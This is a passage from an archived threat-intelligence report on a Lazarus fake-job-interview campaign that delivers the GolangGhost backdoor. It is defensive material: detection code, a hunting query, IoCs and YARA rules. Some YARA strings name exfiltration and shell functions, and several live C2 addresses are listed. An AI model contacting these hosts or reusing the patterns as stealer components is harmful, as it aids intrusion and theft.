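                groups[gkey] = {'start': ts, 'stage': 1, 'chain': [ev]}
            continue
        if sequence[state['stage']] in names:
            state['stage'] += 1
            state['chain'].append(ev)
            if state['stage'] == len(sequence):
                alerts.append({'host': gkey[0], 'parent_pid': gkey[1], 'chain': state['chain']})
                groups.pop(gkey)
    return alerts


if __name__ == '__main__':
    for a in correlate(EVENTS):
        print(a['host'], a['parent_pid'], [e['process.command_line'] for e in a['chain']])
```

The grouping key is what carries the signal here: each stage on its own is ordinary administration, and it is the shared cmd.exe parent plus the ordering inside a two-minute window that separates the lure from a developer unpacking a download. The SOL query that follows takes the simpler route of aggregating the three process names by host and parent PID, leaving the ordering check to the analyst.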
Below is a simple\r\nexample of how you could use that language for the ClickFake Interview case:\r\nevents\r\n| where timestamp \u003e= ago(7d)\r\n| where process.command_line contains~ \"temp\"\r\n| where process.name in [\"curl.exe\", \"powershell.exe\", \"wscript.exe\"]\r\n| aggregate cmd_line = make_set(process.command_line) by host.name, process.parent.pid\r\nWhile the above detection rule and hunting query are good for detecting ClickFake Interview activity, looking at the\r\nRunMRU registry key can be highly reliable as well. The issue is that changes to the key are not frequently logged.\r\nClickFake differs from the traditional ClickFix campaign by first prompting the user to type cmd in the Win+R\r\nwindow, rather than pasting the full malicious command there. Therefore the registry key will contain only the cmd entry,\r\nwhich is still a detection opportunity, but unfortunately one more prone to false positives.\r\nConclusion\r\nIn the continuity of Contagious Interview attributed to Lazarus, the ClickFake Interview campaign targeted job seekers\r\nworking in the cryptocurrency industry with fake hiring processes leading to the deployment of GolangGhost on Windows\r\nand macOS environments. This campaign differs from previous variants of Contagious Interview as it leverages the\r\ninfamous ClickFix tactic to execute backdoors.\r\nThere are similarities between previously documented campaigns related to Contagious Interview and ClickFake Interview.\r\nIndeed, in both cases, the candidates are directed towards legitimate-looking platforms to complete a recruitment process, which\r\nrequires filling out personal information and answering a few questions. 
In the case of Contagious Interview, the candidate\r\ncan be asked to run a backdoored GitHub project on their device, or to accept the installation of software to enable\r\naccess to the camera for a virtual meeting, leading to the infection.\r\nNevertheless, ClickFake Interview stands out due to its playbook approach: templated\r\nwebsites built with ReactJS and various scenarios that culminate in the ClickFix tactic, finally leading to the execution of\r\nGolangGhost, which serves as a backdoor and stealer.\r\nThrough our Sekoia C2 Tracker project, we monitored the emergence of new fake interview websites. We noticed that many\r\nof them are updated daily with fresh staging C2 servers, indicating that the operators have largely automated these\r\nupdates. Furthermore, we observed that several of these websites are suspended on the same day they are created, with\r\nmultiple new sites deployed each day. This may indicate an ongoing legal procedure against this campaign leading to the take\r\ndown of part of the attacker’s infrastructure.\r\nTDR analysts assess ClickFake Interview aligns with Lazarus’ motivation of financial gain through the targeting of cryptocurrency\r\nentities. This campaign is also coherent with the latest trend of DPRK-nexus threat actors increasingly targeting centralised\r\nfinance. A particular element of ClickFake Interview is that the fake job offers are designed to attract profiles other than\r\nsoftware developers and engineers. This may reflect a new Lazarus strategy targeting cryptocurrency industry employees\r\nwith limited technical expertise, making them less likely to recognise the malicious curl command during the interview.\r\nThank you for reading this blog post. Please don’t hesitate to provide your feedback on our publications by clicking\r\nhere. 
You can also contact us at tdr[at]sekoia.io for further discussions; it is always good to have feedback from peers.\r\nIoCs and technical details\r\nAs of 21 March 2025.\r\nNetwork\r\nClickFake Interview websites\r\nvid-crypto-assess[.]com\r\nassessiohq[.]com\r\nblockassess[.]com\r\nblockchainjobassessment[.]com\r\nblockchainjobhub[.]com\r\ncandidateinsightinfo[.]com\r\ncoinbase-walet[.]biz\r\ncoinbase-walet[.]me\r\ncompetency-core[.]com\r\ndevchallengehq[.]com\r\nevalassesso[.]com\r\nevalswift[.]com\r\nquickskill-review[.]com\r\njobinterview360[.]com\r\nlivehirehub[.]com\r\ntalenthiring360[.]com\r\nquickassessio[.]com\r\nquickhire360[.]com\r\nquickinterview360[.]com\r\neskillprof[.]com\r\nevalvidz[.]com\r\nintervwolf[.]com\r\nvidcruiterinterview[.]com\r\nvidcruitermaster[.]com\r\nvidintermaster[.]com\r\nskillhiretrack[.]com\r\nskillprooflab[.]com\r\ntalentcheck[.]pro\r\ntalentsnaptest[.]com\r\ntalentview360[.]com\r\ntest-wolf[.]com\r\ntoptalentassess[.]com\r\nugethired360[.]com\r\nvidassess360[.]com\r\nvidassesspro[.]com\r\nvideorecruitpro[.]com\r\nvidhirehub[.]com\r\nzenspiretech[.]com\r\nStaging C2\r\napi.camdriverhub[.]cloud\r\napi.camdrivers[.]cloud\r\napi.camdriverstore[.]cloud\r\napi.drivercamhub[.]cloud\r\napi.driversnap[.]cloud\r\napi.driverstream[.]cloud\r\napi.provideodrivers[.]cloud\r\napi.smartdriverfix[.]cloud\r\napi.vcamdriverupdate[.]cloud\r\napi.videocarddrivers[.]cloud\r\napi.videodriverzone[.]cloud\r\napi.videotechdrivers[.]cloud\r\napi.vidtechhub[.]cloud\r\napi.webcamdrivers[.]cloud\r\napi.webcamwizard[.]cloud\r\napi.camdriversupport[.]com\r\napi.camera-drive[.]org\r\napi.camtechdrivers[.]com\r\napi.drivercams[.]cloud\r\napi.drive-release[.]cloud\r\napi.nvidia-drive[.]cloud\r\napi.nvidia-release[.]org\r\napi.nvidia-release[.]us\r\napi.web-cam[.]cloud\r\nGolangGhost 
C2\r\nhttp://38.134.148[.]218:8080\r\nhttp://154.62.226[.]22:8080\r\nhttp://72.5.42[.]93:8080\r\nFile hashes\r\nWindows ZIP 1st stage\r\ne88700d069a856e1a16c0da317a6f18fa626dd2d46dcbee1a7403d2e2d9ed097 (nvidiaupdate.zip)\r\nbfac94bfb53b4c0ac346706b06296353462a26fa3bb09fbfc99e3ca090ec127e (update.vbs)\r\nNodeJS loader\r\n887189269c3594e1a851eb22f7c174a7c28618114b7dbaab6b645f34bd809f5a (nvidia.js)\r\nWindows ZIP 2nd stage\r\ne88700d069a856e1a16c0da317a6f18fa626dd2d46dcbee1a7403d2e2d9ed097 (nvidiadrivers.zip)\r\n6289ef57b1772d78da0e54ba4730b6fc79f5ec1620ff63c3abaebea70190eba9 (update.vbs)\r\nGolangGhost Windows\r\n0cbbf7b2b15b561d47e927c37f6e9339fe418badf49fa5f6fc5c49f0dc981100 (go_batch.bat)\r\nef9f49f14149bed09ca9f590d33e07f3a749e1971a31cb19a035da8d84f97aa0 (nvidiaupdate.go)\r\nmacOS 1st stage\r\n3fec701b5e8486081c7062590f4ff947fcf51246cb067f951e90eb43dad930b4 (mediadriver.sh)\r\nf4b4411e403dd5094eef9c8946522fc9a99cf1676c8de5926b3c343264b126e6 (VCam-amd.zip)\r\nd00ca82a32b5e8063492f27dfec225b0888cd6135db3e2af65be3782bbfa16e5 (VCam-intel.zip)\r\nGolangGhost macOS\r\n6e186ada6371f5b970b25c78f38511af8d10faaeaed61042271892a327099925 (cloud.sh)\r\nba81429101a558418c80857781099e299c351b09c8c8ad47df2494634a5332dc (server.go)\r\nFrostyFerret\r\nb7b9e7637a42b5db746f1876a2ecb19330403ecb4ec6f5575db4d94df8ec79e8 (RDriverUpdate or DriverPackX.app)\r\nDecoy content (not malicious, but its presence indicates a user who has been exposed to ClickFake Interview)\r\na803c043e12a5dac467fae092b75aa08b461b8e9dd4c769cea375ff87287a361 (mediadriver.jpg)\r\ne52118fc7fc9b14e5a8d9f61dfae8b140488ae6ec6f01f41d9e16782febad5f2 (uvcupdate.zip)\r\nYARA rules\r\nrule apt_Lazarus_MacOs_ClickFake_Interview_bash_installer {\r\n meta:\r\n id = \"0f59e291-ac25-4e9a-89b8-54ea7015f769\"\r\n intrusion_set = \"Lazarus\"\r\n malware = \"GolangGhost\"\r\n description = \"Detects MacOs installer used in ClickFake Interview campaign\"\r\n 
source = \"Sekoia.io\"\r\n creation_date = \"2025-03-19\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"2805e6efa8877f5707d8e6b29610894f\"\r\n strings:\r\n $s0 = \"#!/bin/bash\"\r\n $s1 = \"PLISST_FILE=~/Library/\"\r\n $s2 = \"ZIP_URL=$ZIP_\"\r\n $s3 = \"chmod +x\"\r\n condition:\r\n filesize \u003c 5KB and\r\n $s0 at 0 and @s1 \u003c @s2 and @s2 \u003c @s3\r\n}\r\nrule apt_Lazarus_ClickFake_Interview_FrostyFerret {\r\n meta:\r\n id = \"12f06933-b0f0-438f-a139-6d0b25ff32e1\"\r\n malware = \"FrostyFerret\"\r\n intrusion_set = \"Lazarus\"\r\n description = \"Detects FrostyFerret based on strings\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-19\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"69bf17d2fb810df08180f0d5b7ce4537\"\r\n strings:\r\n $ = \"content.dropboxapi.com/2/files/upload\"\r\n $ = \"Failed to get public IP address.\"\r\n $ = \"Failed to convert password to data\"\r\n $ = \"The password you entered is incorrect. Please try again.\"\r\n $ = \"Please enter your password to proceed.\"\r\n condition:\r\n uint32be(0) == 0xcafebabe and\r\n 3 of them\r\n}\r\nrule apt_Lazarus_ClickFake_JavaScript {\r\n meta:\r\n id = \"9037b056-c6a9-4089-a30c-377e7461e83e\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\n malware = \"GolangGhost\"\r\n description = \"Detects ReactJS code used in ClickFake campaign\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"d583a05680e83b5b4c7ac2d21920384b\"\r\n strings:\r\n $ = \"/invite/${\"\r\n $ = \"inviteUUID\" nocase\r\n $ = \"The content is copied to the clipboard\"\r\n $ = \"react.element\"\r\n $ = \"Interview\" nocase\r\n condition:\r\n all of them and filesize \u003c 5MB\r\n}\r\nrule apt_Lazarus_ClickFake_ZIP_with_GolangGhost {\r\n meta:\r\n id = \"2cfea7bc-ea80-4bf7-b647-364e01a631ff\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\n malware = 
\"GolangGhost\"\r\n description = \"Detects Lazarus's ZIP file with Go Stealer\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"00b7488d87972e9812e94c69385f6839\"\r\n strings:\r\n $ = { (9A 18| 84 17) 00 00 [4-12] 2F 63 68 72 6F 6D 65 5F 63 6F 6F 6B 69 65 5F 64 61 72 77 69 6E 2E 67 6F}\r\n $ = { (BF 05 | 36 06) 00 00 [4-12] 2F 62 61 73 69 63 2E 67 }\r\n $ = { (08 24 | 95 22 ) 00 00 [4-12] 2F 63 68 72 6F 6D 65 5F 63 6F 6F 6B 69 65 5F 6F 74 68 65 72 2E 67 6F }\r\n condition:\r\n uint32be(0) == 0x504b0304 and\r\n 1 of them\r\n}\r\nrule apt_Lazarus_ClickFake_NodeVBS_Launcher {\r\n meta:\r\n id = \"7c869b72-21ff-463c-b12e-cbd629ca8cc6\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\n malware = \"GolangGhost\"\r\n description = \"Detects Node VBS launcher used in the ClickFake campaign\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"ce37c75d35c82f933e14b00f32c25373\"\r\n strings:\r\n $s = \"objShell.Run \\\"cmd /c node \"\r\n condition:\r\n uint32be(0) == 0x53657420 and\r\n $s in (filesize-50..filesize)\r\n}\r\nrule apt_Lazarus_ClickFake_Go_Backdoor_strings {\r\n meta:\r\n id = \"77f85517-2446-4251-a684-10888312f190\"\r\n version = \"1.0\"\r\n malware = \"GolangGhost\"\r\n intrusion_set = \"Lazarus\"\r\n description = \"Detects Lazarus Go interpreted Backdoor\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"341ba2e57a0f108be75a1515d32a008a\"\r\n strings:\r\n $ = \"func processInfo(\"\r\n $ = \"func processUpload(\"\r\n $ = \"func processWait(\"\r\n $ = \"func processOsShell(\"\r\n $ = \"func StartMainLoop(\"\r\n condition:\r\n uint32be(0) == 0x7061636b and\r\n 3 of them\r\n}\r\nrule apt_Lazarus_ClickFake_GolangGhost_Compiled {\r\n meta:\r\n id = \"f0d1d82e-7cb5-4324-8f11-310d0dc26e48\"\r\n 
version = \"1.0\"\r\n malware = \"GolangGhost\"\r\n intrusion_set = \"Lazarus\"\r\n description = \"Detects Lazarus compiled Go Backdoor\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n strings:\r\n $ = \"bits-project/bits/util\"\r\n $ = \"unknown auto mode\"\r\n $ = \"%s.tar.gz\"\r\n $ = \"AutoModeChromeGather\"\r\n $ = \"UUID: %s, URL: %s\"\r\n condition:\r\n (\r\n (uint16(0) == 0x5a4d) or\r\n (uint32(0) == 0x464c457f) or\r\n (uint32(0) == 0xfeedfacf) or\r\n (uint32(0) == 0xcffaedfe) or\r\n (uint32(0) == 0xfeedface) or\r\n (uint32(0) == 0xcefaedfe)\r\n ) and 4 of them\r\n}\r\nrule apt_Lazarus_ClickFake_NodeJS_Downloader {\r\n meta:\r\n id = \"c74b47ef-7105-4382-b4af-80652ad4047d\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\n malware = \"GolangGhost\"\r\n description = \"Detects the NodeJS Downloader\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"7978d40bd5ca56021f6c250f564e7e27\"\r\n strings:\r\n $ = \"spawn('tar', ['-xf\"\r\n $ = \"/t', 'REG_SZ\"\r\n $ = \"curl/\"\r\n condition:\r\n uint32be(0) == 0x636f6e73 and\r\n filesize \u003c 10KB and\r\n all of them\r\n}\r\nAPT ClickFake Interview ClickFix Contagious Interview CTI FrestoFerret GolangGhost Lazarus\r\nSource: https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/"
	],
	"report_names": [
		"clickfake-interview-campaign-by-lazarus"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c1eadfd8-6e9c-4024-902d-555c9530fcea",
			"created_at": "2023-01-06T13:46:38.645834Z",
			"updated_at": "2026-04-10T02:00:03.04985Z",
			"deleted_at": null,
			"main_name": "TEMP.Hermit",
			"aliases": [],
			"source_name": "MISPGALAXY:TEMP.Hermit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0",
			"created_at": "2022-10-25T15:50:23.240383Z",
			"updated_at": "2026-04-10T02:00:05.299433Z",
			"deleted_at": null,
			"main_name": "APT38",
			"aliases": [
				"APT38",
				"NICKEL GLADSTONE",
				"BeagleBoyz",
				"Bluenoroff",
				"Stardust Chollima",
				"Sapphire Sleet",
				"COPERNICIUM"
			],
			"source_name": "MITRE:APT38",
			"tools": [
				"ECCENTRICBANDWAGON",
				"HOPLIGHT",
				"Mimikatz",
				"KillDisk",
				"DarkComet"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434616,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ee014dd867eed637d08c84509af57fe141d58c21.pdf",
		"text": "https://archive.orkl.eu/ee014dd867eed637d08c84509af57fe141d58c21.txt",
		"img": "https://archive.orkl.eu/ee014dd867eed637d08c84509af57fe141d58c21.jpg"
	}
}